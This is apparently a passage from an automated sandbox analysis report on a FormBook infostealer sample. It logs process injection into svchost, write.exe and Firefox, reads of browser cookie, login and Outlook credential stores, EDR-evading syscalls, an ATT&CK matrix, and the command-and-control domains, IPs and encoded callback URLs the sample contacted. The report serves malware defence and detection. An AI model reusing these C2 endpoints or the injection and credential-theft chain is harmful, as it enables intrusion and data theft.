            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 5024Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63C008Jump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"Jump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: r6lOHDg9N9.exe, fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: r6lOHDg9N9.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: r6lOHDg9N9.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: r6lOHDg9N9.exeBinary or memory string: WIN_XP
            Source: r6lOHDg9N9.exeBinary or memory string: WIN_XPe
            Source: r6lOHDg9N9.exeBinary or memory string: WIN_VISTA
            Source: r6lOHDg9N9.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH2
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549349 Sample: r6lOHDg9N9.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 28 www.030002304.xyz 2->28 30 www.wcm50.top 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 r6lOHDg9N9.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 68 Contains functionality to detect sleep reduction / modifications 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 fZXsbVktlmkz.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 write.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 fZXsbVktlmkz.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 dalong.site 172.96.187.60, 55740, 55741, 55742 SINGLEHOP-LLCUS Canada 22->34 36 www.onemart.site 209.74.95.29, 55564, 55578, 55594 MULTIBAND-NEWHOPEUS United States 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            r6lOHDg9N9.exe66%ReversingLabsWin32.Backdoor.FormBook
            r6lOHDg9N9.exe100%AviraTR/AVI.FormBook.yteeb
            r6lOHDg9N9.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.onemart.site/frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E=0%Avira URL Cloudsafe
            https://htmlcodex.com0%Avira URL Cloudsafe
            http://www.dverkom.store/p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw=0%Avira URL Cloudsafe
            http://www.wcm50.top/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.dalong.site/s20z/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.komart.shop/8r0w/0%Avira URL Cloudsafe
            http://www.030002304.xyz/jkxr/100%Avira URL Cloudmalware
            http://www.onemart.site/frpa/0%Avira URL Cloudsafe
            http://www.polarmuseum.info0%Avira URL Cloudsafe
            http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=100%Avira URL Cloudmalware
            http://www.dalong.site/s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.polarmuseum.info/9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nN0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/tpid/0%Avira URL Cloudsafe
            http://www.polarmuseum.info/9u26/0%Avira URL Cloudsafe
            http://www.dverkom.store/p6ze/0%Avira URL Cloudsafe
            http://www.teerra.shop/szao/0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            komart.shop
            		133.130.35.90
            		truetrue
              		unknown
              www.onemart.site
              		209.74.95.29
              		truetrue
                		unknown
                www.polarmuseum.info
                		13.248.169.48
                		truetrue
                  		unknown
                  zhs.zohosites.com
                  		136.143.186.12
                  		truefalse
                    		high
                    wcm50.top
                    		154.23.184.60
                    		truetrue
                      		unknown
                      www.030002304.xyz
                      		161.97.142.144
                      		truetrue
                        		unknown
                        dalong.site
                        		172.96.187.60
                        		truetrue
                          		unknown
                          target.flexifunnels.com
                          		104.16.6.253
                          		truetrue
                            		unknown
                            www.dverkom.store
                            		31.31.196.17
                            		truetrue
                              		unknown
                              teerra.shop
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.dalong.site
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.teerra.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.komart.shop
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.everycreation.shop
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.wcm50.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.growdigitally.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.lanxuanz.tech
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.onemart.site/frpa/?X8Rx1=znhhIbB8nN&zhl=24K/DZkmoc7bHzW+Clhod14EO+WVCLplL8BuA7PGHf8qDHCdDnlgU8fv6Zi4ouLCHtMfxhN5psYeEWHEa5SDdP5UtNzqgNLmQXsJ8/qLKwWQm26aR0vbL2E=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/s20z/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.lanxuanz.tech/tpid/?zhl=engtnyTNtTQDWNNE7yJ78I7feV66GlGe8mJE780+4T661tYAjJ0+Tu/RlOqq0mFfSRMDbaNY7odrQC55001RANar5S3nmyGvU4LO7et061dPBL96f2mSZAk=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.komart.shop/8r0w/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dverkom.store/p6ze/?X8Rx1=znhhIbB8nN&zhl=/DXHDBoOk7chmVCQ4WrLaW1oMwdAaAsuBp0o9+oEddPaOIwOYOKBw5izboW0tBTgA9UkGMI+Rx3Lys9/a+AsrILRafTHrYx9fF0ImMQ3N0L+QaVHJSdbugw=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.wcm50.top/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.onemart.site/frpa/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.030002304.xyz/jkxr/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.lanxuanz.tech/tpid/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.polarmuseum.info/9u26/?zhl=1KzGVmvOKYmCo1wpuW+r8NP8l/V7/SD2qfM36nKJjIWw5yRzOpl1V5yMlKb+oB0ZkJTr7r2IK3XtbWcKe6/PEalDkn3qwfCmDnUmPcfDndNPzM6SEYrZbR4=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dverkom.store/p6ze/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.dalong.site/s20z/?zhl=OlftTQ9hFz7OT6WFYxCuNpq7ExDWc0YdDdpK6+ifbkXRCNh9PINbo2rFvrFH3ENsTzWiAtX7VHJc4HngX2meKMfLmgA8ppz9ceAA4uFOpb8+rhwBxtyr4dg=&X8Rx1=znhhIbB8nNtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.030002304.xyz/jkxr/?X8Rx1=znhhIbB8nN&zhl=nfZmoz3ZNLa38WJC9Znh/BTcpJZiT6WI1J67BrQcysz4VkbFIz1C0Mwuu1KgUH3yzYFpHG8bYhuiS80nX0UZ0iO0BQhIJ00ZnTsDdGtBOXLHdb2igebUo2U=true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.polarmuseum.info/9u26/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.teerra.shop/szao/true
